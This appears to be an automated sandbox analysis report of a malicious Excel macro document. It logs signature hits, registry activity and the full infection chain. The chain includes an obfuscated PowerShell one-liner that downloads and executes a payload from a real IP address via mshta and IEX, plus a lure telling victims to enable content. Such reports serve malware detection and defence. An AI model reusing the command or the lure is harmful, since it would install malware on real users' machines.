                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>
                            Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: mshta.exe, 00000004.00000003.420762687.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436088284.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437284316.000000000039C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000003.420762687.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436088284.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437284316.000000000039C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
                            Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            Source: NZW-010122 BNUV-280122.xlsm Macro extractor: Sheet: LINKO contains: mshta
                            Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
                            Source: NZW-010122 BNUV-280122.xlsm Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021F8FD12_2_0021F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021D6D812_2_0021D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022473C12_2_0022473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022411612_2_00224116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002313AD12_2_002313AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021AB8712_2_0021AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00217FF212_2_00217FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002159F212_2_002159F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002295FA12_2_002295FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022BE2712_2_0022BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022AA3012_2_0022AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022C63112_2_0022C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00217C3712_2_00217C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022F43512_2_0022F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022AC3A12_2_0022AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230E3A12_2_00230E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00213E3F12_2_00213E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022000112_2_00220001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022860612_2_00228606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230C1412_2_00230C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021481612_2_00214816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00215E6012_2_00215E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022A66612_2_0022A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022AE6D12_2_0022AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022907F12_2_0022907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00226C4912_2_00226C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021205112_2_00212051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021225112_2_00212251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00220E5312_2_00220E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0023005612_2_00230056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00211A5612_2_00211A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00214C5D12_2_00214C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002170B312_2_002170B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021EE8112_2_0021EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022188912_2_00221889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021EA9912_2_0021EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021F09B12_2_0021F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00214EE312_2_00214EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002164E212_2_002164E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022A2E812_2_0022A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00229EEC12_2_00229EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022DCF712_2_0022DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021AEFB12_2_0021AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021B2C712_2_0021B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00225CC412_2_00225CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002266CA12_2_002266CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E2CC12_2_0021E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022DEDC12_2_0022DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022BB2312_2_0022BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00216D2412_2_00216D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00230F3312_2_00230F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021773512_2_00217735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00218B3D12_2_00218B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021971412_2_00219714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022851912_2_00228519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00220B1912_2_00220B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021536112_2_00215361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021896912_2_00218969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022176B12_2_0022176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021BB7E12_2_0021BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021CF4712_2_0021CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021434612_2_00214346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021554812_2_00215548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022894B12_2_0022894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021B74D12_2_0021B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022255012_2_00222550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022CB5B12_2_0022CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021A55F12_2_0021A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022C3A012_2_0022C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227BA612_2_00227BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002309B512_2_002309B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002181B712_2_002181B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002151BB12_2_002151BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00219B8312_2_00219B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00224B8712_2_00224B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022D38912_2_0022D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E99112_2_0021E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022E39512_2_0022E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00228BE312_2_00228BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022DBEA12_2_0022DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021DFF312_2_0021DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00226DF812_2_00226DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00229BCF12_2_00229BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00219DCF12_2_00219DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E5CF12_2_0021E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227DD512_2_00227DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00212BD912_2_00212BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030F8FD15_2_0030F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030E99115_2_0030E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030AB8715_2_0030AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031C63115_2_0031C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031AA3015_2_0031AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031F43515_2_0031F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00307C3715_2_00307C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00320E3A15_2_00320E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031AC3A15_2_0031AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00303C3C15_2_00303C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00303E3F15_2_00303E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031BE2715_2_0031BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030901115_2_00309011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030481615_2_00304816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00320C1415_2_00320C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031000115_2_00310001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031860615_2_00318606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031907F15_2_0031907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00305E6015_2_00305E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031A66615_2_0031A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031AE6D15_2_0031AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030205115_2_00302051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030225115_2_00302251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00310E5315_2_00310E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0032005615_2_00320056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00301A5615_2_00301A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00304C5D15_2_00304C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00316C4915_2_00316C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031044F15_2_0031044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003070B315_2_003070B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003120BA15_2_003120BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030EA9915_2_0030EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030F09B15_2_0030F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030EE8115_2_0030EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031188915_2_00311889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031DCF715_2_0031DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030AEFB15_2_0030AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003064E215_2_003064E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00304EE315_2_00304EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031A2E815_2_0031A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00319EEC15_2_00319EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030D6D815_2_0030D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031DEDC15_2_0031DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00315CC415_2_00315CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030B2C715_2_0030B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003166CA15_2_003166CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030E2CC15_2_0030E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00320F3315_2_00320F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030773515_2_00307735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031473C15_2_0031473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00308B3D15_2_00308B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031BB2315_2_0031BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00306D2415_2_00306D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030971415_2_00309714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031411615_2_00314116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031851915_2_00318519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00310B1915_2_00310B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030BB7E15_2_0030BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030536115_2_00305361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030896915_2_00308969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031176B15_2_0031176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031255015_2_00312550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031CB5B15_2_0031CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030A55F15_2_0030A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030434615_2_00304346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030CF4715_2_0030CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030554815_2_00305548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031894B15_2_0031894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030B74D15_2_0030B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003209B515_2_003209B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003081B715_2_003081B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003051BB15_2_003051BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031C3A015_2_0031C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00317BA615_2_00317BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003213AD15_2_003213AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031E39515_2_0031E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00309B8315_2_00309B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00314B8715_2_00314B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031D38915_2_0031D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00307FF215_2_00307FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003059F215_2_003059F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030DFF315_2_0030DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00316DF815_2_00316DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003195FA15_2_003195FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00318BE315_2_00318BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0031DBEA15_2_0031DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00317DD515_2_00317DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00302BD915_2_00302BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00319BCF15_2_00319BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00309DCF15_2_00309DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0030E5CF15_2_0030E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C000116_2_002C0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B901116_2_002B9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002CAE6D16_2_002CAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002CA66616_2_002CA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C907F16_2_002C907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C044F16_2_002C044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002C20BA16_2_002C20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002BEE8116_2_002BEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002CA2E816_2_002CA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B64E216_2_002B64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002BF8FD16_2_002BF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002BE2CC16_2_002BE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002B6D2416_2_002B6D24
                            Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
                            Source: NZW-010122 BNUV-280122.xlsm Macro extractor: Sheet name: LINKO
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0021E249 DeleteService
                            Source: NZW-010122 BNUV-280122.xlsm, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Svccveo\
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
                            Source: NZW-010122 BNUV-280122.xlsm OLE indicator, VBA macros: true
                            Source: NZW-010122 BNUV-280122.xls.0.dr OLE indicator, VBA macros: true
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$NZW-010122 BNUV-280122.xlsm
                            Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@21/12@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                            Source: NZW-010122 BNUV-280122.xlsm OLE indicator, Workbook stream: true
                            Source: NZW-010122 BNUV-280122.xls.0.dr OLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE2EE.tmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B5988 CreateToolhelp32Snapshot,16_2_002B5988
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB4 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb: source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
